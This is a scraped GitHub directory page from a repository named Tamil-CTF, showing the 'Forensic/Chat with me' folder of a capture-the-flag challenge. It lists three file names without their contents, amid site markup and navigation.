<template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class=" px-2" > <button class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> <div>{{ message }}</div>
</div></div> </template></div>
<include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment>
<div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" data-pjax-container >
<div id="repository-container-header" class="pt-3 hide-full-screen mb-5" style="background-color: var(--color-page-header-bg);" data-pjax-replace>
<div class="d-flex mb-3 px-3 px-md-4 px-lg-5">
<div class="flex-auto min-width-0 width-fit mr-3"> <h1 class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-icon-secondary mr-2"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <span> CYB3R-Syno </span> <span>/</span> Tamil-CTF
<span></span><span>Public</span></h1>
</div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell"> <path d="M8 16a2 2 0 001.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 008 16z"></path><path fill-rule="evenodd" d="M8 1.5A3.5 3.5 0 004.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.018.018 0 00-.003.01l.001.006c0 .002.002.004.004.006a.017.017 0 00.006.004l.007.001h10.964l.007-.001a.016.016 0 00.006-.004.016.016 0 00.004-.006l.001-.007a.017.017 0 00-.003-.01l-1.703-2.554a1.75 1.75 0 01-.294-.97V5A3.5 3.5 0 008 1.5zM3 5a5 5 0 0110 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.518 1.518 0 0113.482 13H2.518a1.518 1.518 0 01-1.263-2.36l1.703-2.554A.25.25 0 003 7.947V5z"></path></svg> Notifications
<div > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom mr-1"> <path fill-rule="evenodd" d="M8 .25a.75.75 0 01.673.418l1.882 3.815 4.21.612a.75.75 0 01.416 1.279l-3.046 2.97.719 4.192a.75.75 0 01-1.088.791L8 12.347l-3.766 1.98a.75.75 0 01-1.088-.79l.72-4.194L.818 6.374a.75.75 0 01.416-1.28l4.21-.611L7.327.668A.75.75 0 018 .25zm0 2.445L6.615 5.5a.75.75 0 01-.564.41l-3.097.45 2.24 2.184a.75.75 0 01.216.664l-.528 3.084 2.769-1.456a.75.75 0 01.698 0l2.77 1.456-.53-3.084a.75.75 0 01.216-.664l2.24-2.183-3.096-.45a.75.75 0 01-.564-.41L8 2.694v.001z"></path></svg> <span> Star</span>
0 </div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked"> <path fill-rule="evenodd" d="M5 3.25a.75.75 0 11-1.5 0 .75.75 0 011.5 0zm0 2.122a2.25 2.25 0 10-1.5 0v.878A2.25 2.25 0 005.75 8.5h1.5v2.128a2.251 2.251 0 101.5 0V8.5h1.5a2.25 2.25 0 002.25-2.25v-.878a2.25 2.25 0 10-1.5 0v.878a.75.75 0 01-.75.75h-4.5A.75.75 0 015 6.25v-.878zm3.75 7.378a.75.75 0 11-1.5 0 .75.75 0 011.5 0zm3-8.75a.75.75 0 100-1.5.75.75 0 000 1.5z"></path></svg> Fork
0
</div>
<div id="responsive-meta-container" data-pjax-replace></div>
<nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M4.72 3.22a.75.75 0 011.06 1.06L2.06 8l3.72 3.72a.75.75 0 11-1.06 1.06L.47 8.53a.75.75 0 010-1.06l4.25-4.25zm6.56 0a.75.75 0 10-1.06 1.06L13.94 8l-3.72 3.72a.75.75 0 101.06 1.06l4.25-4.25a.75.75 0 000-1.06l-4.25-4.25z"></path></svg> <span>Code</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path><path fill-rule="evenodd" d="M8 0a8 8 0 100 16A8 8 0 008 0zM1.5 8a6.5 6.5 0 1113 0 6.5 6.5 0 01-13 0z"></path></svg> <span>Issues</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M7.177 3.073L9.573.677A.25.25 0 0110 .854v4.792a.25.25 0 01-.427.177L7.177 3.427a.25.25 0 010-.354zM3.75 2.5a.75.75 0 100 1.5.75.75 0 000-1.5zm-2.25.75a2.25 2.25 0 113 2.122v5.256a2.251 2.251 0 11-1.5 0V5.372A2.25 2.25 0 011.5 3.25zM11 2.5h-1V4h1a1 1 0 011 1v5.628a2.251 2.251 0 101.5 0V5A2.5 2.5 0 0011 2.5zm1 10.25a.75.75 0 111.5 0 .75.75 0 01-1.5 0zM3.75 12a.75.75 0 100 1.5.75.75 0 000-1.5z"></path></svg> <span>Pull requests</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.5 8a6.5 6.5 0 1113 0 6.5 6.5 0 01-13 0zM8 0a8 8 0 100 16A8 8 0 008 0zM6.379 5.227A.25.25 0 006 5.442v5.117a.25.25 0 00.379.214l4.264-2.559a.25.25 0 000-.428L6.379 5.227z"></path></svg> <span>Actions</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <span>Projects</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-book UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M0 1.75A.75.75 0 01.75 1h4.253c1.227 0 2.317.59 3 1.501A3.744 3.744 0 0111.006 1h4.245a.75.75 0 01.75.75v10.5a.75.75 0 01-.75.75h-4.507a2.25 2.25 0 00-1.591.659l-.622.621a.75.75 0 01-1.06 0l-.622-.621A2.25 2.25 0 005.258 13H.75a.75.75 0 01-.75-.75V1.75zm8.755 3a2.25 2.25 0 012.25-2.25H14.5v9h-3.757c-.71 0-1.4.201-1.992.572l.004-7.322zm-1.504 7.324l.004-5.073-.002-2.253A2.25 2.25 0 005.003 2.5H1.5v9h3.757a3.75 3.75 0 011.994.574z"></path></svg> <span>Wiki</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M7.467.133a1.75 1.75 0 011.066 0l5.25 1.68A1.75 1.75 0 0115 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.7 1.7 0 01-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 011.217-1.667l5.25-1.68zm.61 1.429a.25.25 0 00-.153 0l-5.25 1.68a.25.25 0 00-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.2.2 0 00.154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.25.25 0 00-.174-.237l-5.25-1.68zM9 10.5a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.75a.75.75 0 10-1.5 0v3a.75.75 0 001.5 0v-3z"></path></svg> <span>Security</span> <include-fragment src="/CYB3R-Syno/Tamil-CTF/security/overall-count" accept="text/fragment+html"></include-fragment>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.5 1.75a.75.75 0 00-1.5 0v12.5c0 .414.336.75.75.75h14.5a.75.75 0 000-1.5H1.5V1.75zm14.28 2.53a.75.75 0 00-1.06-1.06L10 7.94 7.53 5.47a.75.75 0 00-1.06 0L3.22 8.72a.75.75 0 001.06 1.06L7 7.06l2.47 2.47a.75.75 0 001.06 0l5.25-5.25z"></path></svg> <span>Insights</span> <span></span>
<div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zM1.5 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zm13 0a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path></svg> <span>More</span> </div></summary> <div data-view-component="true"> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Wiki Security Insights
</details-menu></div></details></div></nav> </div>
<div class="clearfix new-discussion-timeline container-xl px-3 px-md-4 px-lg-5"> <div id="repo-content-pjax-container" class="repository-content " >
<div> <div class="file-navigation mb-3 d-flex flex-items-start"> <div class="position-relative"> <details class="details-reset details-overlay mr-0 mb-0 " id="branch-select-menu"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path fill-rule="evenodd" d="M11.75 2.5a.75.75 0 100 1.5.75.75 0 000-1.5zm-2.25.75a2.25 2.25 0 113 2.122V6A2.5 2.5 0 0110 8.5H6a1 1 0 00-1 1v1.128a2.251 2.251 0 11-1.5 0V5.372a2.25 2.25 0 111.5 0v1.836A2.492 2.492 0 016 7h4a1 1 0 001-1v-.628A2.25 2.25 0 019.5 3.25zM4.25 12a.75.75 0 100 1.5.75.75 0 000-1.5zM3.5 3.25a.75.75 0 111.5 0 .75.75 0 01-1.5 0z"></path></svg> <span>main</span> <span></span> </summary>
<div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg></button> </header>
<input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div>
<div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div>
<div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" class="d-flex flex-column flex-auto overflow-auto" tabindex=""> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/CYB3R-Syno/Tamil-CTF/refs" cache-key="v0:1633096214.446033" current-committish="bWFpbg==" default-branch="bWFpbg==" name-with-owner="Q1lCM1ItU3luby9UYW1pbC1DVEY=" prefetch-on-mouseover >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " style="max-height: 330px" data-pjax="#repo-content-pjax-container"> <div class="SelectMenu-loading pt-3 pb-0" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<footer class="SelectMenu-footer">View all branches</footer> </ref-selector>
</div>
<div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" class="d-flex flex-column flex-auto overflow-auto" tabindex="" hidden> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/CYB3R-Syno/Tamil-CTF/refs" cache-key="v0:1633096214.446033" current-committish="bWFpbg==" default-branch="bWFpbg==" name-with-owner="Q1lCM1ItU3luby9UYW1pbC1DVEY=" >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" style="max-height: 330px" data-pjax="#repo-content-pjax-container"> <div class="SelectMenu-loading pt-3 pb-0" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div>
</details>
</div>
<div class="flex-1 mx-2 flex-self-center f4"> <div class="d-none d-sm-block"> <span><span><span>Tamil-CTF</span></span></span><span>/</span><span><span>Forensic</span></span><span>/</span>Chat with me<span>/</span> </div> </div>
<div class="d-flex"> Go to file </div> </div>
<div class="f4 mt-3 mb-3 d-sm-none"><span><span><span>Tamil-CTF</span></span></span><span>/</span><span><span>Forensic</span></span><span>/</span>Chat with me<span>/</span></div>
<div class="Box mb-3"> <div class="Box-header position-relative"> <h2 class="sr-only">Latest commit</h2> <div class="js-details-container Details d-flex rounded-top-1 flex-items-center flex-wrap" data-issue-and-pr-hovercards-enabled> <include-fragment src="/CYB3R-Syno/Tamil-CTF/tree-commit/58de6d4bb365025a5fcf8f0357bb648c172bffae/Forensic/Chat%20with%20me" class="d-flex flex-auto flex-items-center" aria-busy="true" aria-label="Loading latest commit"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-3"> </div></include-fragment> <div class="flex-shrink-0"> <h2 class="sr-only">Git stats</h2> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-history"> <path fill-rule="evenodd" d="M1.643 3.143L.427 1.927A.25.25 0 000 2.104V5.75c0 .138.112.25.25.25h3.646a.25.25 0 00.177-.427L2.715 4.215a6.5 6.5 0 11-1.18 4.458.75.75 0 10-1.493.154 8.001 8.001 0 101.6-5.684zM7.75 4a.75.75 0 01.75.75v2.992l2.028.812a.75.75 0 01-.557 1.392l-2.5-1A.75.75 0 017 8.25v-3.5A.75.75 0 017.75 4z"></path></svg> <span> History </span> </div> </div> </div> <h2 id="files" class="sr-only">Files</h2>
<include-fragment src="/CYB3R-Syno/Tamil-CTF/file-list/main/Forensic/Chat%20with%20me"> Permalink
<div data-view-component="true" class="include-fragment-error flash flash-error flash-full py-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg> Failed to load latest commit information.
</div> <div class="js-details-container Details"> <div role="grid" aria-labelledby="files" class="Details-content--hidden-not-important js-navigation-container js-active-navigation-container d-block" data-pjax> <div class="sr-only" role="row"> <div role="columnheader">Type</div> <div role="columnheader">Name</div> <div role="columnheader" class="d-none d-md-block">Latest commit message</div> <div role="columnheader">Commit time</div> </div> <div role="row" class="Box-row Box-row--focus-gray p-0 d-flex js-navigation-item" > <div role="rowheader" class="flex-auto min-width-0 col-md-2"> <span>. .</span> </div> <div role="gridcell" class="d-none d-md-block"></div> <div role="gridcell"></div> </div>
<div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-icon-tertiary"> <path fill-rule="evenodd" d="M3.75 1.5a.25.25 0 00-.25.25v11.5c0 .138.112.25.25.25h8.5a.25.25 0 00.25-.25V6H9.75A1.75 1.75 0 018 4.25V1.5H3.75zm5.75.56v2.19c0 .138.112.25.25.25h2.19L9.5 2.06zM2 1.75C2 .784 2.784 0 3.75 0h5.086c.464 0 .909.184 1.237.513l3.414 3.414c.329.328.513.773.513 1.237v8.086A1.75 1.75 0 0112.25 15h-8.5A1.75 1.75 0 012 13.25V1.75z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>Chat with me.md</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-icon-tertiary"> <path fill-rule="evenodd" d="M3.75 1.5a.25.25 0 00-.25.25v11.5c0 .138.112.25.25.25h8.5a.25.25 0 00.25-.25V6H9.75A1.75 1.75 0 018 4.25V1.5H3.75zm5.75.56v2.19c0 .138.112.25.25.25h2.19L9.5 2.06zM2 1.75C2 .784 2.784 0 3.75 0h5.086c.464 0 .909.184 1.237.513l3.414 3.414c.329.328.513.773.513 1.237v8.086A1.75 1.75 0 0112.25 15h-8.5A1.75 1.75 0 012 13.25V1.75z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>Flag.txt</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-icon-tertiary"> <path fill-rule="evenodd" d="M3.75 1.5a.25.25 0 00-.25.25v11.5c0 .138.112.25.25.25h8.5a.25.25 0 00.25-.25V6H9.75A1.75 1.75 0 018 4.25V1.5H3.75zm5.75.56v2.19c0 .138.112.25.25.25h2.19L9.5 2.06zM2 1.75C2 .784 2.784 0 3.75 0h5.086c.464 0 .909.184 1.237.513l3.414 3.414c.329.328.513.773.513 1.237v8.086A1.75 1.75 0 0112.25 15h-8.5A1.75 1.75 0 012 13.25V1.75z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>Use tools.md</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> </div> </div>
</include-fragment>
</div>
</div>
</div></div>
</main> </div>
</div>
<div class="footer container-xl width-full p-responsive" role="contentinfo"> <div class="position-relative d-flex flex-row-reverse flex-lg-row flex-wrap flex-lg-nowrap flex-justify-center flex-lg-justify-between pt-6 pb-2 mt-6 f6 color-fg-muted border-top color-border-muted "> © 2021 GitHub, Inc. Terms Privacy Security Status Docs
<svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path></svg> Contact GitHub Pricing API Training Blog About </div> <div class="d-flex flex-justify-center pb-6"> <span></span> </div></div>
<div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> You can’t perform that action at this time. </div>
<div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template>
<div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div>
